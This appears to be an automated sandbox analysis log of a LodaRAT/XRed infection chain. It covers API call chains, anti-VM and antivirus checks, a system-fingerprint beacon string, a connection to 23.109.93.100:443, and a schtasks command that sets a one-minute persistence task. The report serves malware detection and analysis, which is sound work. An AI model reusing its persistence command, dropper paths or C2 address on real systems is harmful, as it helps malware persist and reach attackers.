                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeCode function: 4_2_004F6B3F _wcscat,_wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,4_2_004F6B3F
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeCode function: 4_2_004F6E4A _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,4_2_004F6E4A
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeCode function: 4_2_004FF350 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,4_2_004FF350
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeCode function: 4_2_004FFD47 FindFirstFileW,FindClose,4_2_004FFD47
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeCode function: 4_2_004FFDD2 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,4_2_004FFDD2
                            Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeCode function: 13_2_00C92044 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,13_2_00C92044
                            Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeCode function: 13_2_00C9219F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,13_2_00C9219F
                            Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeCode function: 13_2_00C924A9 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,13_2_00C924A9
                            Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeCode function: 13_2_00C86B3F _wcscat,_wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,13_2_00C86B3F
                            Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeCode function: 13_2_00C86E4A _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,13_2_00C86E4A
                            Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeCode function: 13_2_00C8F350 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,13_2_00C8F350
                            Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeCode function: 13_2_00C8FDD2 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,13_2_00C8FDD2
                            Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeCode function: 13_2_00C5DD92 GetFileAttributesW,FindFirstFileW,FindClose,13_2_00C5DD92
                            Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeCode function: 13_2_00C8FD47 FindFirstFileW,FindClose,13_2_00C8FD47
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_Google.exeCode function: 32_2_00B12044 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,32_2_00B12044
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_Google.exeCode function: 32_2_00B1219F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,32_2_00B1219F
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_Google.exeCode function: 32_2_00B124A9 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,32_2_00B124A9
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_Google.exeCode function: 32_2_00B06B3F _wcscat,_wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,32_2_00B06B3F
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_Google.exeCode function: 32_2_00B06E4A _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,32_2_00B06E4A
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_Google.exeCode function: 32_2_00B0F350 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,32_2_00B0F350
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_Google.exeCode function: 32_2_00ADDD92 GetFileAttributesW,FindFirstFileW,FindClose,32_2_00ADDD92
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_Google.exeCode function: 32_2_00B0FDD2 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,32_2_00B0FDD2
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_Google.exeCode function: 32_2_00B0FD47 FindFirstFileW,FindClose,32_2_00B0FD47
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeCode function: 4_2_004CE47B GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,4_2_004CE47B
                            Source: C:\ProgramData\Synaptics\Synaptics.exeThread delayed: delay time: 60000Jump to behavior
                            Source: C:\ProgramData\Synaptics\Synaptics.exeThread delayed: delay time: 60000
                            Source: C:\ProgramData\Synaptics\Synaptics.exeThread delayed: delay time: 60000
                            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\userJump to behavior
                            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
                            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppDataJump to behavior
                            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start MenuJump to behavior
                            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
                            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
                            Source: Synaptics.exe, 00000007.00000002.1736596805.000000000057A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW m]%SystemRoot%\system32\mswsock.dll
                            Source: TCPKPY.exe, 00000017.00000003.1711603024.000000000090A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
                            Source: TCPKPY.exe, 00000017.00000003.1711603024.000000000090A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\r
                            Source: wscript.exe, 00000000.00000003.1492572739.000001C7E50D0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1495561900.000001C7E50D0000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000007.00000002.1736596805.00000000005CD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2232844486.00000000006F5000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2232844486.000000000076D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                            Source: Synaptics.exe, 0000001A.00000002.2232844486.00000000006CE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%\system32\dnsapi.dll,-103
                            Source: Synaptics.exe, 00000007.00000002.1736596805.00000000005CD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW=
                            Source: wscript.exe, 00000000.00000003.1491439603.000001C7E28BE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1495274061.000001C7E28D5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1491533263.000001C7E28D0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW`
                            Source: TCPKPY.exe, 00000017.00000003.1711603024.000000000090A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}Q
                            Source: ._cache_Google.exe, 00000004.00000002.2722530892.0000000000F76000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeAPI call chain: ExitProcess graph end nodegraph_4-105197
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeAPI call chain: ExitProcess graph end nodegraph_4-105611
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeProcess information queried: ProcessInformationJump to behavior
                            Source: C:\ProgramData\Synaptics\Synaptics.exeProcess queried: DebugPortJump to behavior
                            Source: C:\ProgramData\Synaptics\Synaptics.exeProcess queried: DebugPort
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeCode function: 4_2_0050703C BlockInput,4_2_0050703C
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeCode function: 4_2_004B374E GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,4_2_004B374E
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeCode function: 4_2_004E46D0 LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,IsDebuggerPresent,OutputDebugStringW,4_2_004E46D0
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeCode function: 4_2_005120F6 LoadLibraryA,GetProcAddress,4_2_005120F6
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeCode function: 4_2_004DA937 GetProcessHeap,4_2_004DA937
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeCode function: 4_2_004D8E19 SetUnhandledExceptionFilter,4_2_004D8E19
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeCode function: 4_2_004D8E3C SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_004D8E3C
                            Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeCode function: 13_2_00C68E19 SetUnhandledExceptionFilter,13_2_00C68E19
                            Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeCode function: 13_2_00C68E3C SetUnhandledExceptionFilter,UnhandledExceptionFilter,13_2_00C68E3C
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_Google.exeCode function: 32_2_00AE8E3C SetUnhandledExceptionFilter,UnhandledExceptionFilter,32_2_00AE8E3C
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_Google.exeCode function: 32_2_00AE8E19 SetUnhandledExceptionFilter,32_2_00AE8E19

                            HIPS / PFW / Operating System Protection Evasion

                            barindex
                            Benign windows process drops PE files
                            Source: C:\Windows\System32\wscript.exeFile created: Machine-PO[1].exe.0.drJump to dropped file
                            System process connects to network (likely due to code injection or exploit)
                            Source: C:\Windows\System32\wscript.exeNetwork Connect: 23.109.93.100 443Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeCode function: 4_2_004EBE95 LogonUserW,4_2_004EBE95
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeCode function: 4_2_004B374E GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,4_2_004B374E
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeCode function: 4_2_004F4B52 SendInput,keybd_event,4_2_004F4B52
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeCode function: 4_2_004F7DD5 mouse_event,4_2_004F7DD5
                            Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exe "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exe"Jump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exeProcess created: C:\Users\user\AppData\Local\Temp\._cache_Google.exe "C:\Users\user\AppData\Local\Temp\._cache_Google.exe" Jump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn UAINOJ.exe /tr C:\Users\user\AppData\Roaming\Windata\TCPKPY.exe /sc minute /mo 1Jump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_Google.exe "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_Google.exe"
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeCode function: 4_2_004EB398 GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,4_2_004EB398
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeCode function: 4_2_004EBE31 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,4_2_004EBE31
                            Source: ._cache_Google.exeBinary or memory string: Shell_TrayWnd
                            Source: wscript.exe, 00000000.00000003.1489655298.000001C7E57E8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1489714337.000001C7E57E8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1490195306.000001C7E57E8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: udeUnterminated group of commentsONOFF0%d%dShell_TrayWndTHISREMOVEblankinfoquestionstopwarning
                            Source: wscript.exe, 00000000.00000003.1488585616.000001C7E5620000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1490310469.000001C7E530E000.00000004.00000020.00020000.00000000.sdmp, Google.exe, 00000003.00000000.1491062963.0000000000566000.00000002.00000001.01000000.00000007.sdmpBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndTHISREMOVEblankinfoquestionstopwarning
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeCode function: 4_2_004D7254 cpuid 4_2_004D7254
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeCode function: 4_2_004D40DA GetSystemTimeAsFileTime,__aulldiv,4_2_004D40DA
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeCode function: 4_2_0052C146 GetUserNameW,4_2_0052C146
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeCode function: 4_2_004E2C3C __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,4_2_004E2C3C
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeCode function: 4_2_004CE47B GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,4_2_004CE47B
                            Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                            Source: ._cache_Google.exe, 00000004.00000002.2722530892.0000000000F76000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntiVirusProduct

                            Stealing of Sensitive Information

                            barindex
                            Yara detected LodaRAT
                            Source: Yara matchFile source: Process Memory Space: ._cache_Google.exe PID: 7960, type: MEMORYSTR
                            Yara detected XRed
                            Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                            Source: Yara matchFile source: 3.0.Google.exe.400000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 00000000.00000003.1489443918.000001C7E5723000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000000.00000003.1491842358.000001C7E51B0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000003.00000000.1490965770.0000000000401000.00000020.00000001.01000000.00000007.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000000.00000003.1488585616.000001C7E54BF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: Process Memory Space: wscript.exe PID: 7732, type: MEMORYSTR
                            Source: Yara matchFile source: Process Memory Space: Google.exe PID: 7912, type: MEMORYSTR
                            Source: Yara matchFile source: C:\Users\user\Documents\LSBIHQFDVT\~$cache1, type: DROPPED
                            Source: Yara matchFile source: C:\ProgramData\Synaptics\RCX4FAD.tmp, type: DROPPED
                            Source: Yara matchFile source: C:\Users\user\Documents\IPKGELNTQY\~$cache1, type: DROPPED
                            Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\Machine-PO[1].exe, type: DROPPED
                            Source: Yara matchFile source: C:\ProgramData\Synaptics\Synaptics.exe, type: DROPPED
                            Source: Yara matchFile source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exe, type: DROPPED
                            Source: ._cache_Google.exe, 00000022.00000003.2151985070.000000000496A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: WIN_81
                            Source: ._cache_Google.exeBinary or memory string: WIN_XP
                            Source: ._cache_Google.exe, 00000004.00000002.2731173530.0000000004188000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 204748952|user|WIN_81|X64| |Windows Defender|192.168.2.8|ddd|Pr1024X21280X3|Desktop|0|beta
                            Source: ._cache_Google.exe, 00000004.00000002.2731173530.0000000004188000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: x|nlrlsu|x|user|WIN_81|X64| |Windows Defender|192.168.2.8|ddd|Pr1024X21280X3|Desktop|0|beta48985]204748984]204749031N
                            Source: TCPKPY.exe, 0000001C.00000003.1855066305.000000000424C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: WIN_81&
                            Source: ._cache_Google.exe, 00000004.00000002.2722530892.0000000000F67000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: x|nlrlsu|x|user|WIN_81|X64| |Windows Defender|EM`T%
                            Source: ._cache_Google.exe, 00000004.00000002.2722530892.0000000000F76000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: x|nlrlsu|x|user|WIN_81|X64| |Windows Defender|192.168.2.8|ddd|Pr1024X21280X3|Desktop|0|beta
                            Source: ._cache_Google.exe, 00000004.00000002.2722530892.0000000000F67000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: x|nlrlsu|x|user|WIN_81|X64| |Windows Defender|?
                            Source: ._cache_Google.exe, 00000004.00000002.2722530892.0000000000F67000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: x|nlrlsu|x|user|WIN_81|X64| |Windows Defender|>
                            Source: ._cache_Google.exe, 00000004.00000002.2722530892.0000000000F76000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: x|nlrlsu|x|user|WIN_81|X64| |Windows Defender|192.168.2.8|ddd|Pr1024X21280X3|Desktop|0|beta\R
                            Source: ._cache_Google.exe, 00000004.00000002.2731173530.0000000004188000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: x|nlrlsu|x|user|WIN_81|X64| |Windows Defender|192.168.2.8|ddd|Pr1024X21280X3|Desktop|0|beta:SystemRoot=C:\Windows
                            Source: ._cache_Google.exeBinary or memory string: WIN_7
                            Source: ._cache_Google.exeBinary or memory string: WIN_8
                            Source: TCPKPY.exe, 00000017.00000003.1761569209.00000000043B7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: WIN_81:
                            Source: ._cache_Google.exe, 00000004.00000002.2731173530.0000000004188000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: x|nlrlsu|x|user|WIN_81|X64| |Windows Defender|192.168.2.8|ddd|Pr1024X21280X3|Desktop|0|beta.
                            Source: ._cache_Google.exe, 00000004.00000002.2722530892.0000000000F76000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: x|nlrlsu|x|user|WIN_81|X64| |Windows Defender|192.168.2.8|ddd|Pr1024X21280X3|Desktop|0|betawR
                            Source: ._cache_Google.exe, 00000004.00000002.2722530892.0000000000F76000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: x|nlrlsu|x|user|WIN_81|X64| |Windows Defender|192.168.2.8|ddd|Pr1024X21280X3|Desktop|0|betaPQ
                            Source: ._cache_Google.exe, 00000004.00000002.2732607207.0000000004353000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: WIN_814
                            Source: ._cache_Google.exe, 00000004.00000002.2731173530.0000000004188000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: x|nlrlsu|x|user|WIN_81|X64| |Windows Defender|192.168.2.8|ddd|Pr1024X21280X3|Desktop|0|betai
                            Source: ._cache_Google.exe, 00000004.00000002.2731173530.0000000004188000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 204748974|user|WIN_81|X64| |Windows Defender|192.168.2.8|ddd|Pr1024X21280X3|Desktop|0|beta
                            Source: ._cache_Google.exe, 00000004.00000002.2722530892.0000000000F76000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: x|nlrlsu|x|user|WIN_81|X64| |Windows Defender|192.168.2.8|ddd|Pr1024X21280X3|Desktop|0|beta,Q
                            Source: TCPKPY.exe, 00000025.00000000.2273762415.0000000000CEE000.00000002.00000001.01000000.0000000C.sdmpBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 10, 2USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubytea
                            Source: ._cache_Google.exe, 00000004.00000002.2731173530.0000000004188000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 204748942|user|WIN_81|X64| |Windows Defender|192.168.2.8|ddd|Pr1024X21280X3|Desktop|0|beta
                            Source: ._cache_Google.exe, 00000004.00000002.2722530892.0000000000F67000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: x|nlrlsu|x|user|WIN_81|X64| |Windows Defender|ms
                            Source: TCPKPY.exe, 0000000D.00000003.1611693531.00000000040AC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: WIN_81Tq
                            Source: TCPKPY.exe, 00000016.00000002.1719077320.0000000004653000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: WIN_81H
                            Source: ._cache_Google.exeBinary or memory string: WIN_XPe
                            Source: ._cache_Google.exe, 00000004.00000002.2731173530.0000000004188000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: x|nlrlsu|x|user|WIN_81|X64| |Windows Defender|192.168.2.8|ddd|Pr1024X21280X3|Desktop|0|beta48985]204748977]204748977
                            Source: ._cache_Google.exe, 00000004.00000002.2722530892.0000000000F67000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: x|nlrlsu|x|user|WIN_81|X64| |Windows Defender|nN
                            Source: ._cache_Google.exeBinary or memory string: WIN_VISTA
                            Source: ._cache_Google.exe, 00000004.00000002.2722530892.0000000000F67000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: x|nlrlsu|x|user|WIN_81|X64| |Windows Defender|
                            Source: ._cache_Google.exe, 00000004.00000002.2731173530.0000000004188000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: x|nlrlsu|x|user|WIN_81|X64| |Windows Defender|192.168.2.8|ddd|Pr1024X21280X3|Desktop|0|beta;dword mingap;86757984\Q
                            Source: ._cache_Google.exe, 00000004.00000002.2722530892.0000000000F67000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: x|nlrlsu|x|user|WIN_81|X64| |Windows Defender|EM`
                            Source: ._cache_Google.exe, 00000020.00000003.1946889559.0000000004875000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: WIN_81O
                            Source: ._cache_Google.exe, 00000004.00000002.2722530892.0000000000F76000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: x|nlrlsu|x|user|WIN_81|X64| |Windows Defender|192.168.2.8|ddd|Pr1024X21280X3|Desktop|0|beta6R
                            Source: ._cache_Google.exe, 00000004.00000002.2731173530.0000000004188000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 204748942|user|WIN_81|X64| |Windows Defender|192.168.2.8|ddd|Pr1024X21280X3|Desktop|0|beta:SystemRoot=C:\Windows
                            Source: ._cache_Google.exe, 00000004.00000002.2722530892.0000000000F67000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: x|nlrlsu|x|user|WIN_81|X64| |Windows Defender|EM`,
                            Source: Yara matchFile source: Process Memory Space: ._cache_Google.exe PID: 7960, type: MEMORYSTR

                            Remote Access Functionality

                            barindex
                            Yara detected LodaRAT
                            Source: Yara matchFile source: Process Memory Space: ._cache_Google.exe PID: 7960, type: MEMORYSTR
                            Yara detected XRed
                            Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                            Source: Yara matchFile source: 3.0.Google.exe.400000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 00000000.00000003.1489443918.000001C7E5723000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000000.00000003.1491842358.000001C7E51B0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000003.00000000.1490965770.0000000000401000.00000020.00000001.01000000.00000007.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000000.00000003.1488585616.000001C7E54BF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: Process Memory Space: wscript.exe PID: 7732, type: MEMORYSTR
                            Source: Yara matchFile source: Process Memory Space: Google.exe PID: 7912, type: MEMORYSTR
                            Source: Yara matchFile source: C:\Users\user\Documents\LSBIHQFDVT\~$cache1, type: DROPPED
                            Source: Yara matchFile source: C:\ProgramData\Synaptics\RCX4FAD.tmp, type: DROPPED
                            Source: Yara matchFile source: C:\Users\user\Documents\IPKGELNTQY\~$cache1, type: DROPPED
                            Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\Machine-PO[1].exe, type: DROPPED
                            Source: Yara matchFile source: C:\ProgramData\Synaptics\Synaptics.exe, type: DROPPED
                            Source: Yara matchFile source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exe, type: DROPPED
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeCode function: 4_2_005091DC socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,4_2_005091DC
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeCode function: 4_2_005096E2 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,4_2_005096E2
